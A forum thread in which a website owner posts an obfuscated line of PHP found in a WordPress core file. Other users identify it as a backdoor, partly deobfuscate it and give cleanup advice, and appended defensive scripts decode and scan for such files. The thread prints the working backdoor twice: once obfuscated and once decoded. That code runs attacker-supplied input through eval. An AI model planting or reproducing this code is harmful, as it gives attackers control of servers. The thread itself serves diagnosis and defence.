7 Replies - 331 Views - Last Post: 20 March 2018 - 10:52 AM

#1 trn

Parse error: syntax error, unexpected '$j205' (T_VARIABLE

Posted 28 February 2018 - 10:04 AM

When I try to access my website, it shows me this error: "Parse error: syntax error, unexpected '$j205' (T_VARIABLE) in /home/tutori43/public_html/wp-includes/embed.php on line 1"

So I opened my C-Panel and checked that file, but I didn't find any error. Can anyone help me find the error?
The PHP code for line 1 is:

1.  <?php                                                                          $f27b62 = 412;$GLOBALS['a04c']=Array();global$a04c;$a04c=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['f43df32b']="\x7d\x64\x4e\x3c\x43\x78\x46\x22\xd\x38\x61\x44\x4b\x79\x42\x3d\x54\x3a\x6a\x37\x6b\x73\x2a\x7e\x4a\x23\x3b\x51\xa\x7a\x50\x60\x24\x40\x6f\x69\x25\x3e\x5f\x28\x39\x6e\x67\x70\x65\x68\x20\x52\x5e\x47\x56\x57\x9\x5b\x2c\x36\x41\x29\x55\x48\x75\x6c\x31\x27\x4d\x7b\x66\x4c\x6d\x53\x33\x2f\x26\x2d\x49\x76\x35\x2e\x2b\x30\x32\x7c\x21\x63\x45\x5c\x71\x3f\x74\x34\x62\x72\x4f\x5a\x58\x5d\x59\x77";$a04c[$a04c['f43df32b'][97].$a04c['f43df32b'][40].$a04c['f43df32b'][83].$a04c['f43df32b'][40]]=$a04c['f43df32b'][43].$a04c['f43df32b'][10].$a04c['f43df32b'][83].$a04c['f43df32b'][20];$a04c[$a04c['f43df32b'][97].$a04c['f43df32b'][1].$a04c['f43df32b'][62].$a04c['f43df32b'][10].$a04c['f43df32b'][10].$a04c['f43df32b'][89].$a04c['f43df32b'][89].$a04c['f43df32b'][79]]=$a04c['f43df32b'][83].$a04c['f43df32b'][34].$a04c['f43df32b'][60].$a04c['f43df32b'][41].$a04c['f43df32b'][88];$a04c[$a04c['f43df32b'][35].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][76].$a04c['f43df32b'][1]]=$a04c['f43df32b'][21].$a04c['f43df32b'][60].$a04c['f43df32b'][90].$a04c['f43df32b'][21].$a04c['f43df32b'][88].$a04c['f43df32b'][91];$a04c[$a04c['f43df32b'][91].$a04c['f43df32b'][1].$a04c['f43df32b'][66].$a04c['f43df32b'][62].$a04c['f43df32b'][62]]=$a04c['f43df32b'][21].$a04c['f43df32b'][88].$a04c['f43df32b'][91].$a04c['f43df32b'][61].$a04c['f43df32b'][44].$a04c['f43df32b'][41];$a04c[$a04c['f43df32b'][34].$a04c['f43df32b'][1].$a04c['f43df32b'][79].$a04c['f43df32b'][89].$a04c['f43df32b'][1].$a04c['f43df32b'][76].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][70]]=$a04c['f43df32b'][44].$a04c['f43df32b'][5].$a04c['f43df32b'][43].$a04c['f43df32b'][61].$a04c['f43df32b'][34].$a04c['f43df32b'][1].$a04c['f43df32b'][44];$a04c[$a04c['f43df32b'][5].$a04c['f43df32b'][83].$a04c['f43df32b'][83].$a04c['f43df32b'][7
9].$a04c['f43df32b'][66].$a04c['f43df32b'][19]]=$a04c['f43df32b'][21].$a04c['f43df32b'][88].$a04c['f43df32b'][91].$a04c['f43df32b'][38].$a04c['f43df32b'][91].$a04c['f43df32b'][44].$a04c['f43df32b'][43].$a04c['f43df32b'][44].$a04c['f43df32b'][10].$a04c['f43df32b'][88];$a04c[$a04c['f43df32b'][42].$a04c['f43df32b'][1].$a04c['f43df32b'][55].$a04c['f43df32b'][40].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][79].$a04c['f43df32b'][76]]=$_POST;$a04c[$a04c['f43df32b'][5].$a04c['f43df32b'][83].$a04c['f43df32b'][76].$a04c['f43df32b'][10].$a04c['f43df32b'][1].$a04c['f43df32b'][10].$a04c['f43df32b'][19]]=$_COOKIE;$cbf2dc1e4=Array($a04c['f43df32b'][91].$a04c['f43df32b'][10].$a04c['f43df32b'][41].$a04c['f43df32b'][1].$a04c['f43df32b'][34].$a04c['f43df32b'][68].$a04c['f43df32b'][62].$a04c['f43df32b'][91].$a04c['f43df32b'][10].$a04c['f43df32b'][41].$a04c['f43df32b'][1].$a04c['f43df32b'][34].$a04c['f43df32b'][68].$a04c['f43df32b'][80]);$b59b6a533=Array($a04c['f43df32b'][91].$a04c['f43df32b'][10].$a04c['f43df32b'][41].$a04c['f43df32b'][1].$a04c['f43df32b'][34].$a04c['f43df32b'][68].$a04c['f43df32b'][70]=>$a04c['f43df32b'][91].$a04c['f43df32b'][10].$a04c['f43df32b'][41].$a04c['f43df32b'][1].$a04c['f43df32b'][34].$a04c['f43df32b'][68].$a04c['f43df32b'][89]);foreach(Array($cbf2dc1e4,$a04c[$a04c['f43df32b'][42].$a04c['f43df32b'][1].$a04c['f43df32b'][55].$a04c['f43df32b'][40].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][79].$a04c['f43df32b'][76]],$b59b6a533,$a04c[$a04c['f43df32b'][5].$a04c['f43df32b'][83].$a04c['f43df32b'][76].$a04c['f43df32b'][10].$a04c['f43df32b'][1].$a04c['f43df32b'][10].$a04c['f43df32b'][19]])as$a89eab9){foreach($a89eab9as$j205=>$yc43c){$[email 
protected]$a04c[$a04c['f43df32b'][97].$a04c['f43df32b'][40].$a04c['f43df32b'][83].$a04c['f43df32b'][40]]($a04c['f43df32b'][59].$a04c['f43df32b'][22],$yc43c);$j205.=$a04c['f43df32b'][70].$a04c['f43df32b'][10].$a04c['f43df32b'][70].$a04c['f43df32b'][55].$a04c['f43df32b'][55].$a04c['f43df32b'][90].$a04c['f43df32b'][44].$a04c['f43df32b'][90].$a04c['f43df32b'][73].$a04c['f43df32b'][89].$a04c['f43df32b'][19].$a04c['f43df32b'][66].$a04c['f43df32b'][40].$a04c['f43df32b'][73].$a04c['f43df32b'][89].$a04c['f43df32b'][19].$a04c['f43df32b'][1].$a04c['f43df32b'][9].$a04c['f43df32b'][73].$a04c['f43df32b'][40].$a04c['f43df32b'][83].$a04c['f43df32b'][76].$a04c['f43df32b'][10].$a04c['f43df32b'][73].$a04c['f43df32b'][62].$a04c['f43df32b'][89].$a04c['f43df32b'][76].$a04c['f43df32b'][10].$a04c['f43df32b'][83].$a04c['f43df32b'][89].$a04c['f43df32b'][10].$a04c['f43df32b'][40].$a04c['f43df32b'][83].$a04c['f43df32b'][1].$a04c['f43df32b'][40].$a04c['f43df32b'][66];$if0c04=$yc43c^$a04c[$a04c['f43df32b'][35].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][76].$a04c['f43df32b'][1]]($a04c[$a04c['f43df32b'][5].$a04c['f43df32b'][83].$a04c['f43df32b'][83].$a04c['f43df32b'][79].$a04c['f43df32b'][66].$a04c['f43df32b'][19]]($j205,($a04c[$a04c['f43df32b'][91].$a04c['f43df32b'][1].$a04c['f43df32b'][66].$a04c['f43df32b'][62].$a04c['f43df32b'][62]]($yc43c)/$a04c[$a04c['f43df32b'][91].$a04c['f43df32b'][1].$a04c['f43df32b'][66].$a04c['f43df32b'][62].$a04c['f43df32b'][62]]($j205))+1),0,$a04c[$a04c['f43df32b'][91].$a04c['f43df32b'][1].$a04c['f43df32b'][66].$a04c['f43df32b'][62].$a04c['f43df32b'][62]]($yc43c));$if0c04=$a04c[$a04c['f43df32b'][34].$a04c['f43df32b'][1].$a04c['f43df32b'][79].$a04c['f43df32b'][89].$a04c['f43df32b'][1].$a04c['f43df32b'][76].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][70]]($a04c['f43df32b'][25],$if0c04);if($a04c[$a04c['f43df32b'][97].$a04c['f43df32b'][1].$a04c['f43df32b'][62].$a04c['f43df32b'][10].$a04c['f43df32b'][10].$a04c['f43df32b'][89].$a04c['f43d
f32b'][89].$a04c['f43df32b'][79]]($if0c04)==3){eval/*v119*/($if0c04[1]($if0c04[2]));exit();}}} ?><?php





Replies To: Parse error: syntax error, unexpected '$j205' (T_VARIABLE

#2 modi123_1

Posted 28 February 2018 - 10:07 AM

Looks malicious to me. Get rid of it and restore a backup, then review your security.

#3 CTphpnwb

Posted 28 February 2018 - 10:09 AM

Post the un-obfuscated version of your code.

#4 RamonRobben

Posted 16 March 2018 - 05:13 AM

The code is doing some weird stuff with variables such as $_POST and $_SESSION. I think it's a script from C-Panel itself because it doesn't seem to do anything else except for executing code. I tried un-obfuscating the code but it's difficult. If anyone is interested in how far I got trying to unobfuscate the code, here ya go:

<?php

$f27b62 = 412;
$GLOBALS['a04c'] = Array();
global $a04c;
$a04c = $GLOBALS;
${"GLOBALS"}['f43df32b'] = "\x7d\x64\x4e\x3c\x43\x78\x46\x22\xd\x38\x61\x44\x4b\x79\x42\x3d\x54\x3a\x6a\x37\x6b\x73\x2a\x7e\x4a\x23\x3b\x51\xa\x7a\x50\x60\x24\x40\x6f\x69\x25\x3e\x5f\x28\x39\x6e\x67\x70\x65\x68\x20\x52\x5e\x47\x56\x57\x9\x5b\x2c\x36\x41\x29\x55\x48\x75\x6c\x31\x27\x4d\x7b\x66\x4c\x6d\x53\x33\x2f\x26\x2d\x49\x76\x35\x2e\x2b\x30\x32\x7c\x21\x63\x45\x5c\x71\x3f\x74\x34\x62\x72\x4f\x5a\x58\x5d\x59\x77";

$a04c["w9c9"] = "pack";
$a04c["wd1aa440"] = "count";
$a04c["i945d"] = "substr";
$a04c["rdf11"] = "strlen";
$a04c["od04d5943"] = "explode";
$a04c["xcc0f7"] = "str_repeat";
$a04c["gd699405"] = $_POST;
$a04c["xc5ada7"] = $_COOKIE;

//this is the same as array 2 but I think he forgot the =>
$cbf2dc1e4 = Array(
	"random1random2"
);

$b59b6a533 = Array(
	"random3" => "random4"
);

//3a366beb-47f9-47d8-9c5a-145ac4a9cd9f

foreach(Array($cbf2dc1e4, $_POST, $b59b6a533, $_COOKIE) as $a89eab9) {
    echo "<br><h1><b>------NEW ROUND------</b></h1>";
    foreach($a89eab9 as $j205 => $yc43c) {

        echo "<b><h3>a89eab9: </b></h3>";
        print_r($a89eab9);
        echo "<br><b><h3>yc43c:</b></h3> {$yc43c}";

        $yc43c = @pack("H*", $yc43c);
        $j205.= "3a366beb-47f9-47d8-9c5a-145ac4a9cd9f";
        echo "<br><b><h3>yc43c:</b></h3> {$yc43c} <br>";
        echo " <b><h3>j205:</b></h3> {$j205} <br>";

        $if0c04 = $yc43c ^ substr(str_repeat($j205, (strlen($yc43c) / strlen($j205)) + 1) , 0, strlen($yc43c));
        echo "<b><h3>printing if0c04 first stage</b></h3><br>";
        echo $if0c04;

        $if0c04 = explode("#", $if0c04);
        echo "<br><b><h3>printing if0c04 second stage</b></h3><br>";
        print_r($if0c04);

        if (count($if0c04) == 3) {
            eval //v119
            ($if0c04[1]($if0c04[2]));
            echo "<br><b><h3>count is 3</b></h3><br>";
            echo "<b><h3>if0c04[1]: </b></h3> {$if0c04[1]} <b><h3>if0c04[2]: </b></h3> {$if0c04[2]}";
            exit();
        }
    }
}


?>




I wrote the echos / prints myself to see what the values were from those variables.

This post has been edited by RamonRobben: 16 March 2018 - 05:13 AM

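Added example, not part of the post above or of the file on the server: the string substitution done by hand in that post can be done statically, without running any of the PHP. The Python sketch below folds each chain of `$a04c['f43df32b'][n]` lookups into a plain string literal, using the lookup table copied from the posted sample; the function names are illustrative.

```python
import re

# Lookup table copied verbatim from the sample posted in this thread.
TABLE_SRC = (
    r"\x7d\x64\x4e\x3c\x43\x78\x46\x22\xd\x38\x61\x44\x4b\x79\x42\x3d\x54\x3a\x6a\x37"
    r"\x6b\x73\x2a\x7e\x4a\x23\x3b\x51\xa\x7a\x50\x60\x24\x40\x6f\x69\x25\x3e\x5f\x28"
    r"\x39\x6e\x67\x70\x65\x68\x20\x52\x5e\x47\x56\x57\x9\x5b\x2c\x36\x41\x29\x55\x48"
    r"\x75\x6c\x31\x27\x4d\x7b\x66\x4c\x6d\x53\x33\x2f\x26\x2d\x49\x76\x35\x2e\x2b\x30"
    r"\x32\x7c\x21\x63\x45\x5c\x71\x3f\x74\x34\x62\x72\x4f\x5a\x58\x5d\x59\x77"
)

def php_unescape(src):
    """Decode \\x escapes as PHP does: one OR two hex digits (\\xd, \\xa, \\x9 here).
    Python's own escape decoding rejects the one-digit form, so parse by hand."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), src)

def php_literal(text):
    """Render decoded text as a single-quoted PHP string literal."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"

def deobfuscate(php, table, var="a04c", key="f43df32b"):
    """Fold every chain $var['key'][n].$var['key'][m]... into one string literal."""
    item = r"\$%s\[['\"]%s['\"]\]\[\d+\]" % (re.escape(var), re.escape(key))
    chain = re.compile(r"%s(?:\.%s)*" % (item, item))

    def fold(match):
        indexes = [int(n) for n in re.findall(r"\[(\d+)\]", match.group(0))]
        if any(i >= len(table) for i in indexes):
            return match.group(0)  # index outside this table: leave source untouched
        return php_literal("".join(table[i] for i in indexes))

    return chain.sub(fold, php)

TABLE = php_unescape(TABLE_SRC)

# Sample input: the first assignment of the posted file, rebuilt from its indexes.
LOOKUP = "$a04c['f43df32b'][%d]"
SAMPLE = ("$a04c[" + ".".join(LOOKUP % i for i in (97, 40, 83, 40)) + "]="
          + ".".join(LOOKUP % i for i in (43, 10, 83, 20)) + ";")

if __name__ == "__main__":
    print(deobfuscate(SAMPLE, TABLE))
```

The input is only ever treated as text, so a copy of an infected file can be decoded on an analysis machine without a PHP interpreter.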

#5 benanamen

Posted 16 March 2018 - 08:39 AM

It is not a C-Panel script. It is a malicious hacking script that allows an attacker to take control of your server. DELETE IT!

This post has been edited by benanamen: 16 March 2018 - 08:40 AM

#6 ArtificialSoldier

Posted 16 March 2018 - 10:49 AM

Yes, this is a back door. If certain data is sent via post then it will perform various tasks to give the attacker access to anything. cPanel's API scripts are well-written and easy to read. This is not that.

#7 Martyr2

Posted 19 March 2018 - 02:32 PM

I have cleaned up a few servers containing code just like this and it is malicious for sure. I only comment now (after a couple of days) because I want to make sure that anyone coming across this post realizes it is malicious AND that it is probably not alone. This type of script tends to spread itself, posing as innocent files, all through the filesystem it can see. It is almost NEVER alone. So if you see a script file that looks like this appear on your server, immediately scan all your web folders and look for files that might be named similarly to other files, but with a radically different modification date. A clear sign that you have found one of these files is that you have a directory containing all one type of file, perhaps with the same modification/created date, and suddenly there is one file with a completely different date. Or the directory is all images and yet there is mysteriously a PHP file in the directory.

On one server I cleaned out a little over 100 of these scripts. So take a close look at all the files or restore back to a point where you know they were clean.

P.S. If you have shell access, also do a quick top or ps command and make sure there are no weird services running. On one server that was infected with stuff like this I found programs running that were doing cryptocurrency mining.

This post has been edited by Martyr2: 19 March 2018 - 02:35 PM

#8 ArtificialSoldier

Posted 20 March 2018 - 10:52 AM

The file modified times can also be a clue. I've been looking through servers that haven't had their files changed in over a year, but you could see modified dates of only a couple of weeks or months ago. Opening any of those files would have a big obfuscated chunk at the top of it. If you miss one of them, the one you miss might be used to infect everything all over again.
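Added example, not written by any poster in this thread: a triage pass over a web root for the three signs described in the last two posts (a PHP file in a directory that otherwise holds only images, a file whose modification time is far from its neighbours', and an obfuscated chunk at the top of a file). The thresholds (30 days, 1000-byte first line, 20 consecutive `\x` escapes) and the function name are assumptions.

```python
import os
import re
import statistics

IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".webp", ".ico", ".svg"}
PHP_EXT = (".php", ".phtml")
# Assumed heuristic: 20 or more consecutive \x escapes near the top of a file.
HEX_RUN = re.compile(rb"(?:\\x[0-9A-Fa-f]{1,2}){20,}")

def triage(webroot, gap_days=30, head_bytes=8192, long_line=1000):
    """Return {path: [reasons]} for PHP files showing the signs described above."""
    findings = {}
    for folder, _dirs, names in os.walk(webroot):
        paths = [os.path.join(folder, n) for n in names]
        if not paths:
            continue
        php = [p for p in paths if p.lower().endswith(PHP_EXT)]
        others = [p for p in paths if p not in php]
        # Typical modification time of the files in this directory.
        median = statistics.median(os.path.getmtime(p) for p in paths)
        for path in php:
            reasons = []
            # A PHP file in a directory that otherwise holds only images.
            if others and all(os.path.splitext(o)[1].lower() in IMAGE_EXT for o in others):
                reasons.append("php-in-image-dir")
            # One file whose date is far from that of its neighbours.
            if len(paths) >= 3 and abs(os.path.getmtime(path) - median) > gap_days * 86400:
                reasons.append("mtime-outlier")
            # A very long first line or a long run of hex escapes at the top.
            with open(path, "rb") as fh:
                head = fh.read(head_bytes)
            if len(head.split(b"\n", 1)[0]) > long_line or HEX_RUN.search(head):
                reasons.append("obfuscated-head")
            if reasons:
                findings[path] = reasons
    return findings

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, reasons in sorted(triage(root).items()):
        print(path, ",".join(reasons))
```

Each hit is a lead for manual review rather than a verdict, and modification times can be reset by whoever wrote the file, so a clean result does not replace restoring from a known-good backup.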